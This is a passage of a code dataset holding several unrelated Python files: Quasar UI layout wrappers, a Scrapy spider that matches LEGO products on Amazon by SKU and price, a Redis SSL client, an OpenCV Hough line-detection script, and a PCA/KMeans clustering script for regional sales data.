\"\"\"\n component = 'q-footer'\n defaults = {\n 'props': {\n 'reveal': False,\n 'elevated': False,\n 'bordered': True,\n 'show': True,\n },\n 'classes': 'bg-white text-black q-px-sm'\n }\n\n def __init__(self,\n children: ChildrenType = None,\n show: PropValueType[bool] = None,\n hide_on_scroll: bool = None, # this is the reveal prop\n elevated: bool = None,\n bordered: bool = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n props = build_props(self.defaults['props'], props, {\n 'reveal': hide_on_scroll,\n 'elevated': elevated,\n 'bordered': bordered,\n 'show': show,\n })\n show = props['show']\n model = show if isinstance(show, Reactive) else Model(show)\n super().__init__(model=model, children=children, classes=classes, styles=styles, props=props, events=events)\n\n\nclass QToolbar(Component):\n component = 'q-toolbar'\n\n\nclass QToolbarTitle(Component):\n component = 'q-toolbar-title'\n\n\nclass QSpace(Component):\n component = 'q-space'\n\n\nclass QBreadcrumbsElement(Component):\n \"\"\"\n ref. https://quasar.dev/vue-components/breadcrumbs#qbreadcrumbsel-api\n \"\"\"\n component = 'q-breadcrumbs-el'\n\n\nclass QBreadcrumbs(Component):\n \"\"\"\n ref. https://quasar.dev/vue-components/breadcrumbs#qbreadcrumbs-api\n \"\"\"\n component = 'q-breadcrumbs'\n\n def __init__(self,\n children: List[QBreadcrumbsElement] = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None):\n super().__init__(\n children=children,\n classes=classes,\n styles=styles,\n props=props,\n events=events)\n\n\nclass QBar(Component):\n \"\"\"\n ref. https://quasar.dev/vue-components/bar#qbar-api\n \"\"\"\n component = 'q-bar'\n", "repo_name": "BarnabasSzabolcs/pyquasargui", "sub_path": "quasargui/layout.py", "file_name": "layout.py", "file_ext": "py", "file_size_in_byte": 8723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "quasargui.base.Component", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 22, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 24, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 25, "usage_type": "name"}, {"api_name": "quasargui.quasar_components.QButton", "line_number": 50, "usage_type": "call"}, {"api_name": "quasargui.callbacks.toggle", "line_number": 54, "usage_type": "call"}, {"api_name": "quasargui.base.ComponentWithModel", "line_number": 63, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 81, "usage_type": "name"}, {"api_name": "quasargui.typing.PropValueType", "line_number": 85, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 86, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 87, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 88, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 93, "usage_type": "call"}, {"api_name": "quasargui.model.Reactive", "line_number": 98, "usage_type": "argument"}, {"api_name": "quasargui.model.Model", "line_number": 98, "usage_type": "call"}, {"api_name": "quasargui.base.ComponentWithModel", "line_number": 102, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 131, "usage_type": "name"}, {"api_name": "quasargui.model.Model", "line_number": 131, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 133, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 134, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 135, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 136, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 143, "usage_type": "call"}, {"api_name": "quasargui.model.Reactive", "line_number": 147, "usage_type": "argument"}, {"api_name": "quasargui.model.Model", "line_number": 147, "usage_type": "call"}, {"api_name": "quasargui.base.Component", "line_number": 151, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 165, "usage_type": "name"}, {"api_name": "quasargui.typing.PropValueType", "line_number": 166, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 167, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 168, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 169, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 170, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 172, "usage_type": "call"}, {"api_name": "quasargui.base.Component", "line_number": 177, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 185, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 186, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 187, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 188, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 189, "usage_type": "name"}, {"api_name": "quasargui.base.ComponentWithModel", "line_number": 194, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 211, "usage_type": "name"}, {"api_name": "quasargui.typing.PropValueType", "line_number": 212, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 216, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 217, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 218, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 219, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 221, "usage_type": "call"}, {"api_name": "quasargui.model.Reactive", "line_number": 228, "usage_type": "argument"}, {"api_name": "quasargui.model.Model", "line_number": 228, "usage_type": "call"}, {"api_name": "quasargui.base.Component", "line_number": 232, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 236, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 240, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 244, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 258, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 259, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 260, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 261, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 262, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 271, "usage_type": "name"}]}
+{"seq_id": "20532988667", "text": "import re\nimport os\nimport shutil\n\nfrom decimal import Decimal\n\nfrom scrapy.selector import HtmlXPathSelector\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nfrom product_spiders.base_spiders import BaseAmazonSpider\n\nfrom scrapy import signals\nfrom scrapy.xlib.pydispatch import dispatcher\n\nfrom product_spiders.fuzzywuzzy.fuzz import ratio, partial_ratio\nfrom product_spiders.fuzzywuzzy import utils\n\nminifigures_words = [\n 'mini figures',\n 'mini figure',\n 'minifigures',\n 'minifigure',\n 'from set',\n 'from sets',\n 'minifig',\n 'loose',\n 'nobox',\n 'from set',\n 'from sets'\n]\n\ndef _filter_name(name):\n \"\"\"\n Filter auxiliary words from product name, like 'new offers for...'\n :param name: product name\n :type name: str\n :return: filtered name\n :rtype: str\n\n >>> _filter_name('New Offers for Lego Ninjago')\n 'Lego Ninjago'\n >>> _filter_name('Lego Ninjago Jouet de Premier')\n 'Lego Ninjago'\n \"\"\"\n words_to_filter_out = ['new offers for']\n\n res = name[:]\n for word in words_to_filter_out:\n m = re.search(word, name, re.I)\n if m:\n res = res.replace(m.group(0), '')\n res = res.strip()\n return res\n\ndef filter_category(name, category):\n category = category.lower()\n m = re.search(category, name, re.I)\n res = name[:]\n if m:\n res = name.replace(m.group(0), '')\n res = res.strip()\n return res\n\ndef name_fuzzy_score(product1, product2):\n product1 = _filter_name(product1)\n product2 = _filter_name(product2)\n\n s1 = utils.full_process(product1)\n s2 = utils.full_process(product2)\n return ratio(s1, s2)\n\ndef name_fuzzy_partial_score(product1, product2):\n product1 = _filter_name(product1)\n product2 = _filter_name(product2)\n\n s1 = utils.full_process(product1)\n s2 = utils.full_process(product2)\n return partial_ratio(s1, s2)\n\ndef name_fuzzy_match(product1, product2):\n product1 = _filter_name(product1)\n product2 = _filter_name(product2)\n\n if name_fuzzy_score(product1, product2) > 50:\n return True\n return False\n\ndef check_max_price(search_price, price, price_diff=0.5):\n \"\"\"\n Checks price variation\n\n >>> check_max_price(12, 60)\n False\n >>> check_max_price(60, 12)\n False\n >>> check_max_price(30, 60)\n True\n >>> check_max_price(60, 30)\n False\n >>> check_max_price(12, 60, 0.8)\n True\n >>> check_max_price(60, 12, 0.8)\n False\n >>> check_max_price(99, 186, 0.6)\n True\n >>> check_max_price(99, 186, 0.5)\n True\n >>> check_max_price(12, 60, 0.7)\n False\n >>> check_max_price(149.99, 499, 1)\n True\n \"\"\"\n search_price = Decimal(search_price)\n price = Decimal(price)\n diff = abs(price - search_price)\n matches = diff / price <= price_diff\n return matches\n\ndef check_price_valid(search_price, price, min_ratio=0.5, max_ratio=3):\n \"\"\"\n Checks price variation for lego.\n Ensures that price is between min_ratio * search_price and max_ratio * search_price\n\n >>> check_price_valid(12, 60)\n False\n >>> check_price_valid(60, 12)\n False\n >>> check_price_valid(30, 60)\n True\n >>> check_price_valid(60, 30)\n True\n >>> check_price_valid(99, 186)\n True\n >>> check_price_valid(99, 186)\n True\n >>> check_price_valid(12, 60)\n False\n >>> check_price_valid(149.99, 499, max_ratio=5)\n True\n >>> check_price_valid(319.99, 39.95)\n False\n >>> check_price_valid(Decimal('319.99'), Decimal('39.95'))\n False\n \"\"\"\n if isinstance(search_price, float):\n search_price = Decimal(str(search_price))\n else:\n search_price = Decimal(search_price)\n\n if isinstance(price, float):\n price = Decimal(str(price))\n else:\n price = Decimal(price)\n\n if isinstance(min_ratio, float):\n min_ratio = Decimal(str(min_ratio))\n else:\n min_ratio = Decimal(min_ratio)\n\n if isinstance(max_ratio, float):\n max_ratio = Decimal(str(max_ratio))\n else:\n max_ratio = Decimal(max_ratio)\n\n if min_ratio * search_price <= price <= max_ratio * search_price:\n return True\n return False\n\ndef sku_match(search_item, new_item):\n _re_sku = re.compile(r'(\\d{3,})')\n sku = _re_sku.findall(new_item['name'].replace(' ', ''))\n sku.extend(_re_sku.findall(new_item['name']))\n sku = set(sku)\n\n search_price = search_item.get('price')\n\n if sku:\n if len(sku) <= 1:\n match_sku = search_item['sku'] in sku\n return match_sku\n elif search_price:\n match_sku = search_item['sku'] in sku\n valid_price = check_price_valid(search_price, new_item['price'])\n if not valid_price:\n return False\n return match_sku\n else:\n return False\n else:\n return False\n\ndef brand_match(new_item):\n brand = new_item.get('brand', '').upper()\n brand_matches = brand == 'LEGO' or brand.startswith('LEGO ') \\\n or 'LEGO' in new_item['name'].upper()\n return brand_matches\n\nclass BaseLegoAmazonSpider(BaseAmazonSpider):\n all_sellers = True\n\n download_delay = 1.0\n randomize_download_delay = True\n\n skus_found = []\n errors = []\n exclude_products = []\n\n lego_amazon_domain = 'www.amazon.com'\n\n def __init__(self, *args, **kwargs):\n super(BaseLegoAmazonSpider, self).__init__(self.lego_amazon_domain, *args, **kwargs)\n self._re_sku = re.compile(r'(\\d{3,})')\n self.try_suggested = False\n self.do_retry = True\n\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n\n self.old_skus = []\n if os.path.exists(self.f_skus_found):\n shutil.copy(os.path.join(HERE, self.f_skus_found),\n os.path.join(HERE, '%s.bak' % self.f_skus_found))\n with open(self.f_skus_found) as f:\n for sku in f:\n self.old_skus.append(sku.strip())\n\n def spider_closed(self, spider):\n missing_skus = set(self.old_skus) - set(self.skus_found)\n for sku in missing_skus:\n self.errors.append('WARNING: sku %s not found' % sku)\n with open(self.f_skus_found, 'w') as f:\n for sku in self.skus_found:\n f.write('%s\\n' % sku)\n\n def match_min_price(self, search_item, new_item, price_diff=0.5):\n ''' Checks price variation '''\n search_price = search_item.get('price', None)\n if not search_price:\n return True\n search_price = Decimal(search_price)\n diff = Decimal(search_price) * Decimal(price_diff)\n matches = search_price - diff <= Decimal(new_item['price'])\n if not matches:\n self.log('Item price is too different from %s, reject %s' % (search_price, new_item))\n return matches\n\n def match_lego_name(self, search_item, new_item):\n sku = self._re_sku.findall(new_item['name'].replace(' ', ''))\n sku.extend(self._re_sku.findall(new_item['name']))\n sku = set(sku)\n\n search_price = search_item.get('price')\n\n if sku:\n if not len(sku) > 1:\n match_sku = search_item['sku'] in sku\n self.log('SKU %s in %s ? %s' % (search_item['sku'], sku, match_sku))\n return match_sku\n elif search_price:\n match_sku = search_item['sku'] in sku\n self.log('SKU %s in %s ? %s' % (search_item['sku'], sku, match_sku))\n valid_price = self._check_max_price(search_price, new_item['price'])\n if not valid_price:\n self.log('Reject lot of products => %s' % new_item['url'])\n return False\n return match_sku\n else:\n self.log('Reject lot of products => %s' % new_item['url'])\n return False\n\n return self.match_name(search_item, new_item, match_threshold=70)\n\n def match(self, search_item, new_item):\n return (self.match_min_price(search_item, new_item)\n and self.match_lego_name(search_item, new_item)\n and not self._excluded_product(new_item['name'])\n and self._valid_terms(new_item['name']))\n\n def basic_match(self, search_item, new_item):\n return self.match_lego_name(search_item, new_item)\n\n def _excluded_product(self, product_name):\n for product in self.exclude_products:\n if product.upper() in product_name.upper():\n return True\n return False\n\n def parse_mbc_list(self, response):\n hxs = HtmlXPathSelector(response)\n\n try:\n hxs.select('//a[@id=\"olpDetailPageLink\"]/@href').extract()[0]\n except:\n yield self.retry_download(failure=None,\n url=response.url,\n metadata=response.meta,\n callback=self.parse_mbc_list)\n else:\n for r in super(BaseLegoAmazonSpider, self).parse_mbc_list(response):\n yield r\n\n def _collect_all(self, collected_items, new_item):\n if new_item['sku'] not in self.skus_found:\n self.skus_found.append(new_item['sku'])\n super(BaseLegoAmazonSpider, self)._collect_all(collected_items, new_item)\n\n def _collect_lowest_price(self, collected_items, new_item):\n if new_item['sku'] not in self.skus_found:\n self.skus_found.append(new_item['sku'])\n super(BaseLegoAmazonSpider, self)._collect_lowest_price(collected_items, new_item)\n\n def _collect_best_match(self, collected_items, new_item, search):\n if new_item['sku'] not in self.skus_found:\n self.skus_found.append(new_item['sku'])\n super(BaseLegoAmazonSpider, self)._collect_best_match(collected_items, new_item, search)\n\n def _check_max_price(self, search_price, price):\n ''' Checks price variation '''\n price_diff = 0.5\n search_price = Decimal(search_price)\n diff = Decimal(search_price) * Decimal(price_diff)\n return Decimal(price) <= search_price + diff\n\n def _valid_terms(self, item_name):\n '''\n [([], []),\n ([...], [...]),\n ([...], [...])]\n '''\n item_name = item_name.lower()\n exclude_ = [(['NO MINIFIG'], []),\n (['FROM SET'], []),\n (['MINIFIG', 'MINIFG'], ['MINIFIGURES', 'INCLUDE'])]\n for values, exceptions in exclude_:\n for w in values:\n if w.lower() in item_name:\n itsvalid = False\n for e in exceptions:\n if e.lower() in item_name:\n itsvalid = True\n break\n if not itsvalid:\n return False\n return True\n\n", "repo_name": "Godsoo/scraping", "sub_path": "e-commerce/CompetitorMonitor/product_spiders/base_spiders/legoamazon.py", "file_name": "legoamazon.py", "file_ext": "py", "file_size_in_byte": 10885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "re.search", "line_number": 50, "usage_type": "call"}, {"api_name": "re.I", "line_number": 50, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 58, "usage_type": "call"}, {"api_name": "re.I", "line_number": 58, "usage_type": "attribute"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", "line_number": 69, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", "line_number": 70, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 70, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.fuzz.ratio", "line_number": 71, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", "line_number": 77, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 77, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", "line_number": 78, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 78, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.fuzz.partial_ratio", "line_number": 79, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 114, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 115, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 147, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 149, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 152, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 154, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 157, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 159, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 162, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 164, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 171, "usage_type": "call"}, {"api_name": "product_spiders.base_spiders.BaseAmazonSpider", "line_number": 199, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 213, "usage_type": "call"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher.connect", "line_number": 217, "usage_type": "call"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher", "line_number": 217, "usage_type": "name"}, {"api_name": "scrapy.signals.spider_closed", "line_number": 217, "usage_type": "attribute"}, {"api_name": "scrapy.signals", "line_number": 217, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path", "line_number": 221, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 240, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 241, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 242, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 289, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 320, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 321, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 322, "usage_type": "call"}]}
+{"seq_id": "20955509464", "text": "import redis\nfrom jproperties import Properties\n\nconfigs = Properties()\ndef client():\n r = redis.Redis(\n host=configs.get(\"hostname\").data,\n port=configs.get(\"port\").data,\n ssl=True,\n ssl_cert_reqs=\"required\",\n ssl_ca_certs=\"redis.pem\")\n\n r.set('foo', 'bar')\n value = r.get('foo')\n print(value)\n\n\ndef main():\n with open('config.properties', 'rb') as read_prop:\n configs.load(read_prop)\n\n client()\n \nif __name__==\"__main__\":\n main()\n", "repo_name": "slibonati/redis-enterprise-operator", "sub_path": "redis-client/redis-client.py", "file_name": "redis-client.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "jproperties.Properties", "line_number": 4, "usage_type": "call"}, {"api_name": "redis.Redis", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "8374613511", "text": "\n\"\"\"\nhttps://mp.weixin.qq.com/s?__biz=MzA4ODgyMDg0MQ==&mid=100001057&idx=1&sn=ebfd3cf30ffb3a48909bd309fa59f82d&chksm=1025182727529131c5c63d02663bfc517b89c23f4884c4d49334fee27d12947b792e9b36643f#rd\n面对直线,你说霍夫线变换是万能的吗\n\nhttps://www.geeksforgeeks.org/line-detection-python-opencv-houghline-method/?ref=gcse\n\ndoc\\lang\\programming\\opencv summary.md\n\n\"\"\"\n\nimport numpy as np\nimport cv2\n\n\"\"\"\n虽然python 3 使用统一编码解决了中文字符串的问题,但在使用opencv中imread函数读取中文路径图像文件时仍会报错\n此时可借助于numpy 先将文件数据读取出来,然后使用opencv中imdecode函数将其解码成图像数据。此方法对python 2 和3均适用。\n\"\"\"\n\nif __name__ == '__main__':\n\n imgData = np.fromfile('./填空题.png', dtype=np.uint8)\n img_origin = cv2.imdecode(imgData, -1)\n img_rgb = cv2.cvtColor(np.asarray(img_origin), cv2.COLOR_BGRA2RGB)\n\n # 转灰度图\n img_gray = cv2.cvtColor(np.asarray(img_origin), cv2.COLOR_BGR2GRAY) #cv2.COLOR_RGB2BGR\n print(type(img_gray))\n\n w = img_gray.shape[0]\n h = img_gray.shape[1]\n\n # slice 子矩阵,既剪裁图像\n img_crop = img_gray[0:w-30, 0:h-70]\n\n # 二值化\n ret, img_binary = cv2.threshold(img_crop, 92, 255, cv2.THRESH_BINARY_INV)\n # imshow(\"1:二值操作\", binaryImage)\n\n # 开操作(将文字这些密集的“孔洞”给腐蚀掉,仅留下直线)\n rect_kernel = cv2.getStructuringElement(\n cv2.MORPH_RECT, (20, 2)) # 定义了20*2 大小的矩形核\n img_opening = cv2.morphologyEx(img_binary, cv2.MORPH_OPEN, rect_kernel)\n\n # 膨胀加粗\n rect_kernel2 = cv2.getStructuringElement(\n cv2.MORPH_RECT, (3, 3)) # 定义了20*2 大小的矩形核\n img_dilate = cv2.dilate(img_opening, rect_kernel2)\n\n #edges = cv2.Canny(img_dilate,50,150,apertureSize=3)\n\n\n # Apply HoughLinesP method to\n # to directly obtain line end points\n lines = cv2.HoughLinesP(\n img_dilate, # Input edge image\n 1, # Distance resolution in pixels\n np.pi/180, # Angle resolution in radians\n threshold=30, # Min number of votes for valid line\n minLineLength=20, # Min allowed length of line\n maxLineGap=0 # Max allowed gap between line for joining them\n )\n\n #img_color = cv2.cvtColor(img_origin, cv2.COLOR_BGR2RGB)\n\n\n for points in lines:\n # Extracted points nested in the list\n x1,y1,x2,y2=points[0]\n # Draw the lines joing the points\n # On the original image\n #cv2.line(img_origin, (x1,y1),(x2,y2),(0,0,255, 255), 2) # 原图是四通道的BGRA(蓝绿红 + alpha 透明度)\n cv2.line(img_rgb, (x1,y1),(x2,y2),(0,0,255), 2) # 看来无论原图怎么样,cv2 的三个通道顺序永远都是: BGR\n \n\n cv2.imshow(\"origin\", img_origin)\n cv2.imshow(\"croped\", img_crop)\n cv2.imshow(\"binary\", img_binary)\n cv2.imshow(\"opening\", img_opening)\n cv2.imshow(\"dilate\", img_dilate) \n cv2.imshow(\"result\", img_rgb)\n\n cv2.waitKey(0)\n\n\n\n \"\"\"\n\ncpp origin\n\n\n# include \n# include \n\nusing namespace std;\nusing namespace cv;\n\nint main()\n{\n Mat srcImage, dstImage, binaryImage;\n srcImage = imread(\"原图.png\",0); \n imshow(\"原图\", srcImage);\n \n waitKey(0);\n return 0;\n}\n\n //剪裁图片\n Mat roiImage = srcImage(Rect(0, 0, srcImage.cols - 70, srcImage.rows - 30));\n imshow(\"0:抠图操作\", roiImage);\n\n //对图像进行二值化\n threshold(roiImage, binaryImage, 92, 255, THRESH_BINARY_INV );\n imshow(\"1:二值操作\", binaryImage);\n\n\n Mat morhpImage;\n Mat kernel = getStructuringElement(MORPH_RECT, Size(20, 2), Point(-1, -1));//自定义一个核\n morphologyEx(binaryImage, morhpImage, MORPH_OPEN, kernel, Point(-1, -1));//开操作\n imshow(\"2:开操作\", morhpImage);\n\n\n Mat dilateImage;\n kernel = getStructuringElement(MORPH_RECT, Size(3, 3), Point(-1, -1));\n dilate(morhpImage, dilateImage, kernel);\n imshow(\"3:膨胀操作\", dilateImage);\n\n \n vector lines;\n HoughLinesP(dilateImage, lines, 1, CV_PI / 180.0, 30, 20.0, 0);\n dstImage = srcImage.clone();\n cvtColor(dstImage, dstImage, COLOR_GRAY2BGR);\n for (size_t t = 0; t < lines.size(); t++) {\n Vec4i ln = lines[t];\n line(dstImage, Point(ln[0], ln[1]), Point(ln[2], ln[3]), Scalar(0, 0, 255), 2, 8, 0);\n }\n imshow(\"4:绘制直线\", dstImage);\n\n \"\"\"\n\n", "repo_name": "dlxj/doc", "sub_path": "lang/programming/python/opencv/面对直线你说霍夫线变换是万能的吗/h.py", "file_name": "h.py", "file_ext": "py", "file_size_in_byte": 4383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.fromfile", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGRA2RGB", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.MORPH_RECT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 43, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.MORPH_RECT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "21338398794", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\n#Librería para la normalización de datos \nfrom sklearn.preprocessing import StandardScaler\n# Librería para aplicación de Componentes Princiales\nfrom sklearn.decomposition import PCA\n# Librearías para clusterización y métricas de evaluación\nfrom sklearn.cluster import KMeans,AgglomerativeClustering \nimport pandas as pd\n\n\n# In[5]:\n\n\ndataset_consolidado_canton=pd.read_csv('C:/Users/Byron/Documents/curso_power_bi_sri/data_consolidada_canton.csv')\n\n\n# In[2]:\n\n\ndataset_consolidado_canton\ncampos_numericos=['Suma de Total Compras','Suma de Total Ventas','Suma de Ventas Netas 0%','Suma de Ventas Netas 12%',\n 'Suma de Importaciones','Suma de Exportaciones',\n 'Suma de Compras Rise','Suma de Compras netas 12%','Suma de Compras netas 0%']\n\ncampos_numericos_100K=['Suma de Total Compras','Suma de Total Ventas','Suma de Ventas Netas 0%','Suma de Ventas Netas 12%',\n 'Suma de Importaciones','Suma de Exportaciones',\n 'Suma de Compras Rise','Suma de Compras netas 12%','Suma de Compras netas 0%']\n\n\n# In[3]:\n\n\n# Estandarización de datos numéricos de acuerdo al número de habitantes (x cada 10000 habitantes )\ncontador_campos_numericos=0\nfor campo in campos_numericos: \n dataset_consolidado_canton[campo]=dataset_consolidado_canton[campos_numericos[contador_campos_numericos]]*10000/dataset_consolidado_canton['Suma de Habitantes']\n contador_campos_numericos=contador_campos_numericos+1\n\n\n# In[12]:\n\n\n#Normalización de datos\n# Obtención de dataset únicamente con datos numéricos para aplicar procesos de normalización, PCA y clusterización\ndataset_consolidado_canton_Num=dataset_consolidado_canton.loc[:,campos_numericos ]\nscaler=StandardScaler()\ndataset_normalizado=scaler.fit_transform(dataset_consolidado_canton_Num)\n\n\n# In[14]:\n\n\n# Cálculo de PCA utilizado 2 componentes \npca=PCA(n_components=2)\npca.fit(dataset_normalizado)\npca.transform(dataset_normalizado)\nscores_pca=pca.transform(dataset_normalizado)\n\n\n# In[24]:\n\n\n# CLUSTERIZACION KMEANS\nmetricas_evaluacion_kmeans=list()\ndata_for_scatter=scores_pca\nkmeans = KMeans(n_clusters = 3).fit(data_for_scatter)\n\n#Consolidado cluster\ndataset_consolidado_canton['cluster']=kmeans.labels_\n\n\n# In[25]:\n\n\ndataset_consolidado_canton.to_excel(\"C:/Users/Byron/Documents/curso_power_bi_sri/consolidado_cluster.xlsx\") \n\n", "repo_name": "bodg010715/UNIR_BYRON_DEL_PINO", "sub_path": "proceso_clusterizacion.py", "file_name": "proceso_clusterizacion.py", "file_ext": "py", "file_size_in_byte": 2403, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 